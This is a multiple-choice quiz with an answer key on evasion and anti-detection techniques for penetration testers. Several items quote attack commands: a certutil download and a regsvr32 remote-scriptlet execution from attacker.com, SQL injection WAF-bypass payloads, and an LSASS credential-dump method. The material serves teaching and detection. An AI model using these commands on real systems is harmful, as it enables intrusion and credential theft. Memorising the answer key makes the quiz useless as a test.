Chapter 27 Quiz: Evasion and Anti-Detection Techniques

Test your understanding of evasion concepts, techniques, and detection strategies. Select the best answer for each question.


Question 1: Why is evasion testing important in penetration testing engagements?

A) It demonstrates the tester's advanced technical skills to the client
B) It reveals whether detection capabilities actually work against realistic adversary techniques
C) It allows the tester to remain undetected indefinitely for maximum damage assessment
D) It is required by all penetration testing certifications


Question 2: Which detection method analyzes a program's runtime behavior rather than its static characteristics?

A) Signature-based detection
B) Heuristic analysis
C) Behavioral detection
D) YARA rule matching


Question 3: An EDR agent hooks NtAllocateVirtualMemory in ntdll.dll to inspect memory allocation calls. What evasion technique bypasses this hook?

A) Encoding the payload with shikata_ga_nai
B) Using direct syscall instructions to call the kernel without going through ntdll.dll
C) Changing the process name to a legitimate Windows binary name
D) Running the payload from a network share instead of local disk


Question 4: What is AMSI (Antimalware Scan Interface) primarily designed to detect?

A) Malicious network traffic patterns
B) Kernel-mode rootkits and drivers
C) Malicious scripts and in-memory content submitted by applications like PowerShell
D) Hardware-based attacks on the CPU


Question 5: Which of the following is NOT a characteristic of Living Off the Land (LOTL) techniques?

A) Using signed, legitimate system binaries for malicious purposes
B) Avoiding the need to drop custom tools to disk
C) Exploiting zero-day vulnerabilities in system utilities
D) Blending with normal system administration activity


Question 6: A penetration tester uses certutil -urlcache -split -f http://attacker.com/payload.exe C:\temp\payload.exe to download a file. Which MITRE ATT&CK technique does this best represent?

A) T1055 - Process Injection
B) T1105 - Ingress Tool Transfer
C) T1027 - Obfuscated Files or Information
D) T1070 - Indicator Removal


Question 7: DNS tunneling works as a covert channel because:

A) DNS traffic is always encrypted with TLS
B) DNS traffic on UDP port 53 is typically allowed through firewalls
C) DNS servers cannot log query content
D) DNS queries are too small to be analyzed by IDS systems


Question 8: Which of the following is the most reliable indicator of DNS tunneling?

A) DNS queries using UDP instead of TCP
B) DNS queries for A records
C) Unusually long subdomain labels and high query volume to a single domain
D) DNS queries resolving to private IP addresses


Question 9: A WAF blocks the SQL injection payload ' UNION SELECT null,null,null--. Which bypass technique uses MySQL-specific comment syntax?

A) ' UnIoN SeLeCt null,null,null--
B) ' /*!UNION*/ /*!SELECT*/ null,null,null--
C) ' %55NION %53ELECT null,null,null--
D) ' UN/**/ION SEL/**/ECT null,null,null--


Question 10: What does "jitter" refer to in the context of C2 beacon communication?

A) Encryption strength of the beacon traffic
B) Random variation added to the beacon interval to avoid pattern detection
C) The number of retries before the beacon gives up connecting
D) Fragmentation of beacon traffic into smaller packets


Question 11: Which C2 framework is open-source and uses the Go programming language to generate cross-platform implants with mTLS support?

A) Cobalt Strike
B) Sliver
C) Nighthawk
D) Brute Ratel C4


Question 12: Cobalt Strike's malleable C2 profiles allow operators to:

A) Automatically exploit vulnerabilities without user interaction
B) Customize the network communication patterns of Beacon to mimic legitimate traffic
C) Bypass all EDR solutions regardless of configuration
D) Generate undetectable payloads through advanced encryption


Question 13: What is domain fronting?

A) Registering domains that look similar to legitimate domains for phishing
B) Using the difference between the TLS SNI field and the HTTP Host header to hide C2 traffic behind legitimate CDN domains
C) Purchasing expired domains that previously belonged to trusted organizations
D) Creating multiple DNS A records pointing to different C2 servers for redundancy


Question 14: A red team operator needs to dump credentials from LSASS memory without dropping Mimikatz to disk. Which LOTL approach could achieve this?

A) Using rundll32.exe with comsvcs.dll to create a MiniDump of the LSASS process
B) Using certutil.exe to decode the LSASS memory space
C) Using mshta.exe to load a credential harvesting HTA
D) Using bitsadmin.exe to transfer LSASS memory to a remote share


Question 15: JA3 fingerprinting detects C2 traffic by:

A) Analyzing the content of encrypted HTTPS payloads
B) Creating a hash of TLS handshake parameters (cipher suites, extensions, etc.) to identify known C2 clients
C) Comparing SSL certificate serial numbers against a blocklist
D) Monitoring the DNS resolution patterns of C2 domains


Question 16: Which Sysmon Event ID is most useful for detecting process injection techniques?

A) Event ID 1 (Process Creation)
B) Event ID 3 (Network Connection)
C) Event ID 8 (CreateRemoteThread)
D) Event ID 11 (File Creation)


Question 17: An attacker uses regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll to execute code. This technique is known as:

A) DLL sideloading
B) Squiblydoo attack
C) Process hollowing
D) AppLocker bypass via COM hijacking


Question 18: What is the primary limitation of using simple XOR encoding (like shikata_ga_nai) for payload evasion against modern AV solutions?

A) XOR encoding makes payloads too large to transfer over the network
B) Modern AV products detect the encoding stub patterns and can emulate/decode the payload
C) XOR encoding changes the payload's functionality, causing it to crash
D) XOR encoding is only available for 32-bit payloads


Question 19: Which approach best describes the ethical framework for using evasion techniques during authorized testing?

A) Use maximum evasion at all times to provide the most realistic assessment
B) Use minimum evasion necessary to achieve test objectives, document all techniques, and provide remediation recommendations
C) Avoid evasion entirely since it makes the test harder for defenders to monitor
D) Use evasion only during red team exercises, never during standard penetration tests


Question 20: The MITRE ATT&CK tactic dedicated to evasion techniques is:

A) TA0001 - Initial Access
B) TA0003 - Persistence
C) TA0005 - Defense Evasion
D) TA0011 - Command and Control


Answer Key

  1. B - Evasion testing reveals whether an organization's detection capabilities actually work against realistic adversary techniques, providing actionable intelligence for improvement.

  2. C - Behavioral detection monitors what a program does at runtime (API calls, file operations, network connections) rather than analyzing its static characteristics on disk.

  3. B - Direct syscall instructions bypass user-mode hooks in ntdll.dll by calling kernel functions directly, avoiding the hooked API layer where EDR agents inspect calls.

  4. C - AMSI is designed to scan scripts and in-memory content submitted by applications like PowerShell, JScript, and .NET before execution, catching fileless malware.

  5. C - LOTL techniques use legitimate tools for unintended purposes; they do not exploit zero-day vulnerabilities in those tools. The tools function as designed; it is their application that is malicious.

  6. B - Using certutil to download files from an external server maps to T1105 (Ingress Tool Transfer), as it transfers tools or payloads into the target environment.

  7. B - DNS traffic on UDP port 53 is typically allowed through firewalls because it is essential for normal network operations, making it an effective covert channel.

  8. C - The most reliable indicators of DNS tunneling are unusually long subdomain labels (containing encoded data) and abnormally high query volumes to a single domain.

  9. B - MySQL inline comment syntax /*!...*/ executes the content as SQL while appearing as a comment to WAF regex patterns that look for keywords outside comments.

  10. B - Jitter is the random variation (typically expressed as a percentage) added to the beacon sleep interval to prevent the predictable, periodic check-in pattern that network analysts detect.

  11. B - Sliver is an open-source C2 framework by BishopFox, written in Go, that generates cross-platform implants supporting mTLS, WireGuard, HTTP/S, and DNS protocols.

  12. B - Malleable C2 profiles customize every aspect of Beacon's network communication, including HTTP headers, URIs, data encoding, and timing, to mimic legitimate traffic patterns.

  13. B - Domain fronting exploits the difference between the SNI field (visible to network inspectors) and the HTTP Host header (encrypted) to hide C2 traffic behind legitimate CDN-hosted domains.

  14. A - The comsvcs.dll MiniDump technique uses a legitimate, signed Microsoft DLL to dump LSASS process memory, avoiding the need to drop Mimikatz or other tools to disk.

  15. B - JA3 fingerprinting creates a hash of the TLS ClientHello parameters (cipher suites, extensions, elliptic curves, etc.) to identify specific TLS client implementations, including known C2 frameworks.

  16. C - Sysmon Event ID 8 (CreateRemoteThread) specifically logs when a process creates a thread in another process, which is a core indicator of process injection techniques.

  17. B - The Squiblydoo attack uses regsvr32 to fetch and execute remote scriptlets (.sct files), bypassing application whitelisting since regsvr32 is a signed Microsoft binary.

  18. B - Modern AV products maintain signatures for common encoding stubs (including shikata_ga_nai) and can emulate the decoding process to reveal the underlying payload for analysis.

  19. B - Ethical evasion testing uses the minimum evasion necessary, documents all techniques used, and provides remediation recommendations. The value is in the disclosure and improvement, not in demonstrating stealth for its own sake.

  20. C - TA0005 (Defense Evasion) is the MITRE ATT&CK tactic dedicated to techniques that adversaries use to avoid detection throughout their operation.